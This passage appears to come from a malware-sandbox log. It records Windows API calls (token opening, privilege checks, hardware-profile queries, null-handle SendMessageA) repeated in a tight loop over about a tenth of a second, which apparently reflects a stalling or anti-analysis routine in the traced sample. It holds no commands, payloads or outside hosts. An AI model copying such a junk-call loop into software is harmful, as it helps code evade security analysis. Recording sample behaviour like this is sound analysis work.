CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.063] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.063] GetCurrentThread () returned 0xfffffffe [0085.063] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.063] GetLastError () returned 0x3f0 [0085.063] GetCurrentProcess () returned 0xffffffff [0085.170] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.170] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.170] SetLastError (dwErrCode=0x522) [0085.170] CloseHandle (hObject=0x114) returned 1 [0085.171] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.171] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.171] GetLastError () returned 0x578 [0085.171] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.171] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.171] GetCurrentThread () returned 0xfffffffe [0085.171] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.171] GetLastError () returned 0x3f0 [0085.171] GetCurrentProcess () returned 0xffffffff [0085.171] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.171] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.171] SetLastError (dwErrCode=0x522) [0085.171] CloseHandle (hObject=0x114) returned 1 [0085.171] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.171] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.171] GetLastError () returned 0x578 [0085.171] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.171] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.171] GetCurrentThread () returned 0xfffffffe [0085.171] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.171] GetLastError () returned 0x3f0 [0085.171] GetCurrentProcess () returned 0xffffffff [0085.171] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.171] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.171] SetLastError (dwErrCode=0x522) [0085.171] CloseHandle (hObject=0x114) returned 1 [0085.171] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.171] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.171] GetLastError () returned 0x578 [0085.171] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.171] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.171] GetCurrentThread () returned 0xfffffffe [0085.172] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.172] GetLastError () returned 0x3f0 [0085.172] GetCurrentProcess () returned 0xffffffff [0085.172] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.172] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.172] SetLastError (dwErrCode=0x522) [0085.172] CloseHandle (hObject=0x114) returned 1 [0085.172] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.172] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.172] GetLastError () returned 0x578 [0085.172] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.172] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.172] GetCurrentThread () returned 0xfffffffe [0085.172] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.172] GetLastError () returned 0x3f0 [0085.172] GetCurrentProcess () returned 0xffffffff [0085.172] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.172] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.172] SetLastError (dwErrCode=0x522) [0085.172] CloseHandle (hObject=0x114) returned 1 [0085.172] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.172] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.172] GetLastError () returned 0x578 [0085.172] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.172] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.172] GetCurrentThread () returned 0xfffffffe [0085.172] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.172] GetLastError () returned 0x3f0 [0085.172] GetCurrentProcess () returned 0xffffffff [0085.172] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.172] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.172] SetLastError (dwErrCode=0x522) [0085.172] CloseHandle (hObject=0x114) returned 1 [0085.173] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.173] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.173] GetLastError () returned 0x578 [0085.173] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.173] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.173] GetCurrentThread () returned 0xfffffffe [0085.173] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.173] GetLastError () returned 0x3f0 [0085.173] GetCurrentProcess () returned 0xffffffff [0085.173] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.173] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.173] SetLastError (dwErrCode=0x522) [0085.173] CloseHandle (hObject=0x114) returned 1 [0085.173] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.173] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.173] GetLastError () returned 0x578 [0085.173] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.173] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.173] GetCurrentThread () returned 0xfffffffe [0085.173] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.174] GetLastError () returned 0x3f0 [0085.174] GetCurrentProcess () returned 0xffffffff [0085.174] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.174] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.174] SetLastError (dwErrCode=0x522) [0085.174] CloseHandle (hObject=0x114) returned 1 [0085.174] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.174] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.174] GetLastError () returned 0x578 [0085.174] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.174] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.174] GetCurrentThread () returned 0xfffffffe [0085.174] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.174] GetLastError () returned 0x3f0 [0085.174] GetCurrentProcess () returned 0xffffffff [0085.174] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.174] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.174] SetLastError (dwErrCode=0x522) [0085.174] CloseHandle (hObject=0x114) returned 1 [0085.174] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.174] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.174] GetLastError () returned 0x578 [0085.174] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.174] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.174] GetCurrentThread () returned 0xfffffffe [0085.174] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.174] GetLastError () returned 0x3f0 [0085.174] GetCurrentProcess () returned 0xffffffff [0085.174] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.174] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.174] SetLastError (dwErrCode=0x522) [0085.174] CloseHandle (hObject=0x114) returned 1 [0085.174] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.175] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.175] GetLastError () returned 0x578 [0085.175] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.175] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.175] GetCurrentThread () returned 0xfffffffe [0085.175] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.175] GetLastError () returned 0x3f0 [0085.175] GetCurrentProcess () returned 0xffffffff [0085.175] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.175] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.175] SetLastError (dwErrCode=0x522) [0085.175] CloseHandle (hObject=0x114) returned 1 [0085.175] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.175] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.175] GetLastError () returned 0x578 [0085.175] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.175] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.175] GetCurrentThread () returned 0xfffffffe [0085.175] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.175] GetLastError () returned 0x3f0 [0085.175] GetCurrentProcess () returned 0xffffffff [0085.175] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.175] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.175] SetLastError (dwErrCode=0x522) [0085.175] CloseHandle (hObject=0x114) returned 1 [0085.175] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.175] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.175] GetLastError () returned 0x578 [0085.175] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.175] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.175] GetCurrentThread () returned 0xfffffffe [0085.175] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.175] GetLastError () returned 0x3f0 [0085.175] GetCurrentProcess () returned 0xffffffff [0085.175] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.176] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.176] SetLastError (dwErrCode=0x522) [0085.176] CloseHandle (hObject=0x114) returned 1 [0085.176] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.176] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.176] GetLastError () returned 0x578 [0085.176] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.176] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.176] GetCurrentThread () returned 0xfffffffe [0085.176] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.176] GetLastError () returned 0x3f0 [0085.176] GetCurrentProcess () returned 0xffffffff [0085.176] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.176] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.176] SetLastError (dwErrCode=0x522) [0085.176] CloseHandle (hObject=0x114) returned 1 [0085.176] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.176] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.176] GetLastError () returned 0x578 [0085.176] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.176] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.176] GetCurrentThread () returned 0xfffffffe [0085.176] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.176] GetLastError () returned 0x3f0 [0085.176] GetCurrentProcess () returned 0xffffffff [0085.176] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.176] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.176] SetLastError (dwErrCode=0x522) [0085.176] CloseHandle (hObject=0x114) returned 1 [0085.176] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.176] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.176] GetLastError () returned 0x578 [0085.176] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.176] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.176] GetCurrentThread () returned 0xfffffffe [0085.176] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.176] GetLastError () returned 0x3f0 [0085.176] GetCurrentProcess () returned 0xffffffff [0085.176] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.177] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.177] SetLastError (dwErrCode=0x522) [0085.177] CloseHandle (hObject=0x114) returned 1 [0085.177] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.177] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.177] GetLastError () returned 0x578 [0085.177] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.177] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.177] GetCurrentThread () returned 0xfffffffe [0085.177] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.177] GetLastError () returned 0x3f0 [0085.177] GetCurrentProcess () returned 0xffffffff [0085.177] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.177] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.177] SetLastError (dwErrCode=0x522) [0085.177] CloseHandle (hObject=0x114) returned 1 [0085.177] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.177] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.177] GetLastError () returned 0x578 [0085.177] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.177] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.177] GetCurrentThread () returned 0xfffffffe [0085.177] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.177] GetLastError () returned 0x3f0 [0085.177] GetCurrentProcess () returned 0xffffffff [0085.177] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.177] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.177] SetLastError (dwErrCode=0x522) [0085.177] CloseHandle (hObject=0x114) returned 1 [0085.177] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.177] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.177] GetLastError () returned 0x578 [0085.177] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.177] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.177] GetCurrentThread () returned 0xfffffffe [0085.177] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.177] GetLastError () returned 0x3f0 [0085.177] GetCurrentProcess () returned 0xffffffff [0085.178] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.178] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.178] SetLastError (dwErrCode=0x522) [0085.178] CloseHandle (hObject=0x114) returned 1 [0085.178] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.178] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.178] GetLastError () returned 0x578 [0085.178] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.178] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.178] GetCurrentThread () returned 0xfffffffe [0085.178] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.178] GetLastError () returned 0x3f0 [0085.178] GetCurrentProcess () returned 0xffffffff [0085.178] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.178] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.178] SetLastError (dwErrCode=0x522) [0085.178] CloseHandle (hObject=0x114) returned 1 [0085.178] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.178] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.178] GetLastError () returned 0x578 [0085.178] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.178] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.178] GetCurrentThread () returned 0xfffffffe [0085.178] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.178] GetLastError () returned 0x3f0 [0085.178] GetCurrentProcess () returned 0xffffffff [0085.178] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.178] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.178] SetLastError (dwErrCode=0x522) [0085.178] CloseHandle (hObject=0x114) returned 1 [0085.178] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.178] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.178] GetLastError () returned 0x578 [0085.178] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.178] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.178] GetCurrentThread () returned 0xfffffffe [0085.178] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.178] GetLastError () returned 0x3f0 [0085.179] GetCurrentProcess () returned 0xffffffff [0085.179] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.179] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.179] SetLastError (dwErrCode=0x522) [0085.179] CloseHandle (hObject=0x114) returned 1 [0085.179] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.179] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 